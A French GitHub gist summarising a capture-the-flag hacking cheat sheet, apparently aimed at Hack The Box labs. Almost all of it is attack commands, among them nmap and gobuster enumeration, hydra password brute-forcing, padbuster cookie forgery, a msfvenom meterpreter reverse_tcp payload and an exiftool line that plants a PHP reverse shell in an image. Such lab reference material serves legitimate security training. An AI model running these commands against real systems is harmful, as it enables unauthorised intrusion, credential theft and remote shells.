Skip to content

Instantly share code, notes, and snippets.

@maxgfr

maxgfr/recap_hack.md

Last active July 14, 2020 09:49
Show Gist options
  • Save maxgfr/12bdee5d2948a2dae0d952accd7cff49 to your computer and use it in GitHub Desktop.
Save maxgfr/12bdee5d2948a2dae0d952accd7cff49 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
recap_hack.md

Recap de https://lestutosdeprocessus.fr/ctf-cheat-sheet/

Reverse shell samples :

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Scripts d’énumération automatique :

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Commandes d’interaction (pour CTF communs)

who

-> Affiche les tty connectés

wall “hello world !”

-> Envoie un message sur tous les tty connectés

Transfert de fichiers

socat TCP4-LISTEN:1234 TCP4:10.10.10.171:80 &

-> Lance un relai TCP vers une autre machine (pivoting)

Pratique lorsqu’on se connecte à HTB via un VPS

python -m SimpleHTTPServer <PORT>

-> Lance un serveur web dans le répertoire local

apt-get install python-pyftpdlib

python -m pyftpdlib -p 21

->Lance un serveur ftp dans le répertoire courant

Enumération :

nslookup -type=<MX / A / AAA / TXT / CNAME / PTR> <DOMAIN>

nslookup -type=MX test.fr

nmap ( -A : détection du système et des versions -sP : simple ping scan -sS/sT/sA/sW/sM: Scans TCP SYN/Connect()/ACK/Window/Maimon -sN/sF/sX: Scans TCP Null, FIN et Xmas -sU: Scan UDP -T4 : Définit une temporisation[0-5] )

nmap -A -T4 -sV 10.10.10.157

smbclient –list //<IPADDRESS>/ -U “”

smbclient –list //10.10.10.134/ -U “”

nmap –script <SCRIPT> -p <PORT> <IPADDRESS>

nmap –script smb-vuln* -p 139,445 10.10.10.134

nikto -h <URL> -p <PORTS>

nikto -h 192.168.0.1 -p 80,443

gobuster –url <IP ADDRESS> dir –wordlist <WORDLIST> -x <EXTENSION>

gobuster –url 10.10.10.157 dir –wordlist /usr/share/wordlists/dirb/big.txt -x php,txt,html,htm

-k -> pas de vérification du certificat SSL

cat *.txt | gobuster –url 10.10.10.157 dir –wordlist –

-> pour piper plusieurs wordlists dans gobuster

dirb <url> <wordlist>

dirb http://docker.hackthebox.eu:58651 /usr/share/dirb/wordlists/vulns/apache.txt

dirb options : -a “agent” -> spécifie un user-agent -R -> récursivité interactive -o output.txt -> redirige l’output

wfuzz –hh=<PARAM_SIZE> -w <WORDLIST> <URL>.php?<PARAM_NAME>=test

wfuzz –hh=24 -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test

Exploitation & Elévation de privilèges :

python -c ‘import pty; pty.spawn(“/bin/sh”)’

Pour obtenir un shell plus élevé, afin de passer d’un reverse shell à un shell complet

padbuster <URL> <COOKIE> <BLOCK_SIZE> -cookies “<PHPESSID_COOKIE> <OPTIONNAL_COOKIES>” –plaintext ‘<NEW_VALUE>’

padbuster http://docker.hackthebox.eu:59436/profile.php tu%2FOelHH0Nx8BaMhIurtihnbzj6YiABdvdMp0%2Fm6NII%2FClg%2B5Os9Rg%3D%3D 8 -cookies “PHPSESSID=74j9m7o8pbaq8pdoq3l56rvpk4; iknowmag1k=tu%2FOelHH0Nx8BaMhIurtihnbzj6YiABdvdMp0%2Fm6NII%2FClg%2B5Os9Rg%3D%3D” –plaintext ‘{“user”:”test”,”role”:”admin”}’

searchsploit -t <INTITLE> <KEYWORDS> -w

searchsploit windows local smb

sudo -l

-> liste les commandes autorisées pour l’utilisateur courant

find / -type d -writable 2> /dev/null

-> Liste les répertoires accessibles en écriture

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null

-> Liste les binaires exécutables par l’utilisateur courant

find / -type f -perm /6000 -ls 2>/dev/null

-> Liste les fichiers setuid/setgid sur le système

find / -iname “mon_fichier” -print 2>/dev/null

-> Trouver un fichier précis sur le système

msfvenom -p windows/meterpreter/reverse_tcp lhost=<LOCALIP> lport=<LOCALPORT> -f <FORMAT> > <OUTPUTFILE>

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 -f exe > payload.exe

exiftool -Comment='<?php $sock = fsockopen(“<IPADDRESS>”,<PORT>);$proc = proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>’ <IMAGE>

exiftool -Comment='<?php $sock = fsockopen(“10.10.10.1”,1234);$proc = proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>’ photo.png

Injection SQL :

sqlmap -u <URL> (–dbs / –tables -D <DATABASE> / –columns -D <DATABASE> -T <TABLENAME>)

sqlmap -u http://bidule.fr/index.php?id= –columns -D information_schema -T USER_PRIVILEGES

Bruteforce :

crunch <MIN> <MAX> <CONTENT>

crunch 4 15 “abcdefghijklmnopqrstuvwxyz”

hydra -l <USER> -P <WORDLIST> <IP ADDRESS> <METHOD> <URL>

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.157 http-get /monitoring

hydra -l <LOGIN> -P <WORDLIST> <URL> <METHOD>”<PAGE>:<ARGUMENT>=^<VALUE>^:<INCORRECT STRING>” -w <THREADS> -s <PORT>

hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/index.php:password=^PASS^:Invalid password” -w 10 -s 45692

john –incremental <HASHFILE>

john –incremental hash

Script de bruteforce anti-CSRF :

https://github.com/J3wker/anti-CSRF_Token-Bruteforce

Mémo Assembleur

Les Registres et leurs fonctions : alt text

Les Instructions : alt text alt text

Commandes gdb :

disass main -> désassemblage de la fonction main

b *0x5655555d0 -> placer un breakpoint à l’adresse spécifiée

x/x $eip -> Affiche la valeur d’un registre ($ = valeur)

x/i $eip -> Affiche la prochaine instruction dans le registre eip

x/wx $esp -> Affiche la valeur sur la stack

r -> run

c -> continue

dumpargs -> dumper les arguments du programme

Pour faire un buffer overflow, il suffit de récupérer l’adresse de la sauvegarde du registre eip et l’adresse de début du buffer, on peut soustraire les deux et trouver le nombre de caractères que prend en compte notre buffer

Compiler sans protection :

gcc -m32 -fno-stack-protector -z execstack bof.c -o bof

-> Si la compil en 32bits ne fonctionne pas, installer libc en 32bits :

apt-get install libc6-dev-i386

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment